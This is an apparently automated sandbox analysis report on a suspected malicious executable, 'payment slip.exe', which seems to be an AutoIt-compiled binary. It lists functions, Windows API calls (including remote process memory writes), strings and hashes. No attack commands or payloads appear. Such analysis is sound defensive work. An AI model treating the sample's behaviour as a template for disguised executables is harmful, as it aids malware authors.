                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: a718a9dcb87a0a0d643ac899007d4e6488a35570ed70670730d2789fad512695
                                        • Instruction ID: 9a2c29090ea236d730528d1b3bb72ad22ebd10bb307834cd5c0a2f0f84524784
                                        • Opcode Fuzzy Hash: a718a9dcb87a0a0d643ac899007d4e6488a35570ed70670730d2789fad512695
                                        • Instruction Fuzzy Hash: BE01AE72800B199FCB30AFA6D880812FBF9BF613153158A3FD19652931C3B1AA58DF80
                                        Function 0006D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0006D752
                                          • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                          • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                        • _free.LIBCMT ref: 0006D764
                                        • _free.LIBCMT ref: 0006D776
                                        • _free.LIBCMT ref: 0006D788
                                        • _free.LIBCMT ref: 0006D79A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: fc035b8bbcd68164667cc1b0fd7b53d4186bc9adff4bbb0fcff08d414e899edb
                                        • Instruction ID: 442dbe1b57ebc2cab997533cd15784fe20133d5ad86001c5f15452473495e133
                                        • Opcode Fuzzy Hash: fc035b8bbcd68164667cc1b0fd7b53d4186bc9adff4bbb0fcff08d414e899edb
                                        • Instruction Fuzzy Hash: A2F03632B48608AB9665EB64FAC6C6A77DFBB44750B940C0AF048D7902DB34FC80D675
                                        Function 00095C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00095C58
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00095C6F
                                        • MessageBeep.USER32(00000000), ref: 00095C87
                                        • KillTimer.USER32(?,0000040A), ref: 00095CA3
                                        • EndDialog.USER32(?,00000001), ref: 00095CBD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: d7042b1d29d19a277a90468198e90ed4de5d4b25cd87fc8a1e22e4ec2315a971
                                        • Instruction ID: 68b5090b8fcbe92622c99bf0fc511a762244c68b25f6f8037231f53c7d8b98f0
                                        • Opcode Fuzzy Hash: d7042b1d29d19a277a90468198e90ed4de5d4b25cd87fc8a1e22e4ec2315a971
                                        • Instruction Fuzzy Hash: 9E013170500B04AFFF325B11DE4EFEA77B8BB04B06F041659E687A15E1DBF4A9849B90
                                        Function 000622A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 000622BE
                                          • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                          • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                        • _free.LIBCMT ref: 000622D0
                                        • _free.LIBCMT ref: 000622E3
                                        • _free.LIBCMT ref: 000622F4
                                        • _free.LIBCMT ref: 00062305
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 57fa046b1e474347aed3bc5983e93df5ce422be48d0c901228576a0027f73e50
                                        • Instruction ID: 7da6be415a42971f37a670a793cef530dc7628d51cc55d76547205bb65f483ba
                                        • Opcode Fuzzy Hash: 57fa046b1e474347aed3bc5983e93df5ce422be48d0c901228576a0027f73e50
                                        • Instruction Fuzzy Hash: F8F05470500915ABD717AF54BC02D5C3BA6F718B91B10050AF450D2A72CBB80891FFF5
                                        Function 000495C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • EndPath.GDI32(?), ref: 000495D4
                                        • StrokeAndFillPath.GDI32(?,?,000871F7,00000000,?,?,?), ref: 000495F0
                                        • SelectObject.GDI32(?,00000000), ref: 00049603
                                        • DeleteObject.GDI32 ref: 00049616
                                        • StrokePath.GDI32(?), ref: 00049631
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                        • String ID:
                                        • API String ID: 2625713937-0
                                        • Opcode ID: e82cc5724931719ea44121ab506209affd4bec5c07b1e74fd6c3697d5fc8daf5
                                        • Instruction ID: 4851afddf3048a438f32eab2f3990a28817a2ddf5efb82bbafb328c6ac5764c4
                                        • Opcode Fuzzy Hash: e82cc5724931719ea44121ab506209affd4bec5c07b1e74fd6c3697d5fc8daf5
                                        • Instruction Fuzzy Hash: 06F03C31005604EBEB265F65ED1CF653BA1BB09326F148224F4A9554F0C7B88991DF24
                                        Function 00060F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: __freea$_free
                                        • String ID: a/p$am/pm
                                        • API String ID: 3432400110-3206640213
                                        • Opcode ID: af90be36a4e1ac48e960faba878f62cee57cf8700a25d166e48b8b11e521748e
                                        • Instruction ID: 0ace4c10c96b955b1b28b32b678f39c26b859a506bcd21b53c986151386ba351
                                        • Opcode Fuzzy Hash: af90be36a4e1ac48e960faba878f62cee57cf8700a25d166e48b8b11e521748e
                                        • Instruction Fuzzy Hash: 8FD10071900216DADB689F68C855BFEB7F3EF06300F2C4119E906ABB91D3759E81CB91
                                        Function 000B7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00050242: EnterCriticalSection.KERNEL32(0010070C,00101884,?,?,0004198B,00102518,?,?,?,000312F9,00000000), ref: 0005024D
                                          • Part of subcall function 00050242: LeaveCriticalSection.KERNEL32(0010070C,?,0004198B,00102518,?,?,?,000312F9,00000000), ref: 0005028A
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                          • Part of subcall function 000500A3: __onexit.LIBCMT ref: 000500A9
                                        • __Init_thread_footer.LIBCMT ref: 000B7BFB
                                          • Part of subcall function 000501F8: EnterCriticalSection.KERNEL32(0010070C,?,?,00048747,00102514), ref: 00050202
                                          • Part of subcall function 000501F8: LeaveCriticalSection.KERNEL32(0010070C,?,00048747,00102514), ref: 00050235
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                        • String ID: 5$G$Variable must be of type 'Object'.
                                        • API String ID: 535116098-3733170431
                                        • Opcode ID: 5b056afccd6888470c3c01e516f5c58d030cbe0949142020fa1b3a8f09147bc4
                                        • Instruction ID: e64870ae6b3bf2ca43812df4ef96a333d66422d7c23ce38967bc1f5ab3d41669
                                        • Opcode Fuzzy Hash: 5b056afccd6888470c3c01e516f5c58d030cbe0949142020fa1b3a8f09147bc4
                                        • Instruction Fuzzy Hash: F8917970A04209EFCB14EF94D891DEDBBB5EF89340F10805DF84AAB292DB71AE41CB51
                                        Function 00092716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0009B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000921D0,?,?,00000034,00000800,?,00000034), ref: 0009B42D
                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00092760
                                          • Part of subcall function 0009B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0009B3F8
                                          • Part of subcall function 0009B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0009B355
                                          • Part of subcall function 0009B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00092194,00000034,?,?,00001004,00000000,00000000), ref: 0009B365
                                          • Part of subcall function 0009B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00092194,00000034,?,?,00001004,00000000,00000000), ref: 0009B37B
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000927CD
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0009281A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                        • String ID: @
                                        • API String ID: 4150878124-2766056989
                                        • Opcode ID: a6cfc29172ba3719999d954735383a97a5f7ace10cd3aa0fc657e03f25553056
                                        • Instruction ID: 66e4c8ac7fe0f92fb92e684bbb5319a726bc959b28b18c39a5c0319456f9602c
                                        • Opcode Fuzzy Hash: a6cfc29172ba3719999d954735383a97a5f7ace10cd3aa0fc657e03f25553056
                                        • Instruction Fuzzy Hash: 4E411972900218BFDF10DBA4DD85EEEBBB8AF09710F108099FA55B7181DB706E45DBA1
                                        Function 0006172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\payment slip.exe,00000104), ref: 00061769
                                        • _free.LIBCMT ref: 00061834
                                        • _free.LIBCMT ref: 0006183E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\payment slip.exe
                                        • API String ID: 2506810119-607663974
                                        • Opcode ID: 42d5f333dc30ca2aa84072996ce9ff7b011d4dbf9467c139a040e01308ed1ac2
                                        • Instruction ID: d759e7e0547068a1131b687cf17ee0cdf1a88bf9dede768b0f7a192b5721148e
                                        • Opcode Fuzzy Hash: 42d5f333dc30ca2aa84072996ce9ff7b011d4dbf9467c139a040e01308ed1ac2
                                        • Instruction Fuzzy Hash: D8316275A04218BFDB21DF99D885DDEBBFEEB85310F184166F805D7212DAB04E40CB90
                                        Function 0009C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0009C306
                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 0009C34C
                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00101990,00E154F8), ref: 0009C395
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem
                                        • String ID: 0
                                        • API String ID: 135850232-4108050209
                                        • Opcode ID: f30fb79b36475234f4daf2414d7bd518b4f206366ec1bda18e595c1f29a54caf
                                        • Instruction ID: e20c252a32469c43d68941a988db35a89456ce01c041f6417ae8c451ee044e54
                                        • Opcode Fuzzy Hash: f30fb79b36475234f4daf2414d7bd518b4f206366ec1bda18e595c1f29a54caf
                                        • Instruction Fuzzy Hash: 4B41C3716043019FEB20DF24D844F5ABBE8AF85320F00C61DF8A5972D2D770EA04DB52
                                        Function 000C4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,000CCC08,00000000,?,?,?,?), ref: 000C44AA
                                        • GetWindowLongW.USER32 ref: 000C44C7
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C44D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        • Opcode ID: b7ef0626a413ac0278af8031235753f475e4849834d76ab871ce8a6f37d96dc8
                                        • Instruction ID: 336237b4f661781fafe78a2d68ddaf31ae817c733c7363b18ac0f1336989168b
                                        • Opcode Fuzzy Hash: b7ef0626a413ac0278af8031235753f475e4849834d76ab871ce8a6f37d96dc8
                                        • Instruction Fuzzy Hash: 27318931210605AFEB658F38DC45FEA7BA9FB08324F204329F979921E1D774AC509B50
                                        Function 000C4537 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 000C461F
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000C4634
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: U$'
                                        • API String ID: 3850602802-2019772650
                                        • Opcode ID: 3904fc2bef018e9d625f99ce4bb5e02bfe502ca91d69fcbab060cd7660199096
                                        • Instruction ID: fcd3c15875c043c34de3c0f0383feaec0971e2052c851aba169da72c3d1f6a4f
                                        • Opcode Fuzzy Hash: 3904fc2bef018e9d625f99ce4bb5e02bfe502ca91d69fcbab060cd7660199096
                                        • Instruction Fuzzy Hash: 59311774A006099FDB14CFA9C990FDE7BB5FB09300F10406AE904AB342D771A941CF90
                                        Function 00096E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SysReAllocString.OLEAUT32(?,?), ref: 00096EED
                                        • VariantCopyInd.OLEAUT32(?,?), ref: 00096F08
                                        • VariantClear.OLEAUT32(?), ref: 00096F12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Variant$AllocClearCopyString
                                        • String ID: *j
                                        • API String ID: 2173805711-743776685
                                        • Opcode ID: 5e25fe899bc25197b962d042141806cd4168299028e44f8eb10c29abbdebbfed
                                        • Instruction ID: 8cfcc243ad2ddfd282dbd93ff14ef09722ecb6e1f23c561fe849f7a2e53a0696
                                        • Opcode Fuzzy Hash: 5e25fe899bc25197b962d042141806cd4168299028e44f8eb10c29abbdebbfed
                                        • Instruction Fuzzy Hash: 8A319172604245DFDF19AFA4E8A19FD37B5FF85304F1004A9F9038B2A2C7359916EB90
                                        Function 000B304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000B335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,000B3077,?,?), ref: 000B3378
                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
                                        • _wcslen.LIBCMT ref: 000B309B
                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 000B3106
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                        • String ID: 255.255.255.255
                                        • API String ID: 946324512-2422070025
                                        • Opcode ID: 61bfd0a999dd0a42bb62ec8791d693d400f9e881bc6bc7c423663d20e74c3975
                                        • Instruction ID: 127fe75fb20fe246c2b350602370887e5abc88330a9979ee3dae01aa58c5bd6d
                                        • Opcode Fuzzy Hash: 61bfd0a999dd0a42bb62ec8791d693d400f9e881bc6bc7c423663d20e74c3975
                                        • Instruction Fuzzy Hash: 8531F1396002019FDB20DF28C895EEA77E4EF14318F348559E9169B392DB72EE45CB60
                                        Function 000995AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                        • API String ID: 176396367-2734436370
                                        • Opcode ID: 908f1353ebb3ce898aebbcf5e48a2c16adc83b61b11ca7822df4186208235bb2
                                        • Instruction ID: 23c89aa448047508f0bd41acb430e7c70bff1c73c61a1c03b371959c9136cddf
                                        • Opcode Fuzzy Hash: 908f1353ebb3ce898aebbcf5e48a2c16adc83b61b11ca7822df4186208235bb2
                                        • Instruction Fuzzy Hash: 3221087210461166DB31AB2C9C06FFB73EC9F51310F15842EFD499B182EB91AD45E3D6
                                        Function 000C37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 000C3840
                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 000C3850
                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 000C3876
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        • Opcode ID: edeb58deb277bfd2ddd34762b0c4761348a37375a9b6705e23d049b26426e04c
                                        • Instruction ID: d395cbe6f663a5f49a55d97b5dcb969ba84037de15fb957e6e1ce797427058ee
                                        • Opcode Fuzzy Hash: edeb58deb277bfd2ddd34762b0c4761348a37375a9b6705e23d049b26426e04c
                                        • Instruction Fuzzy Hash: 1A218072614218BBEB219F54DC85FBF37AEEF89750F11C118F9049B190CA75DC5187A0
                                        Function 000A49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
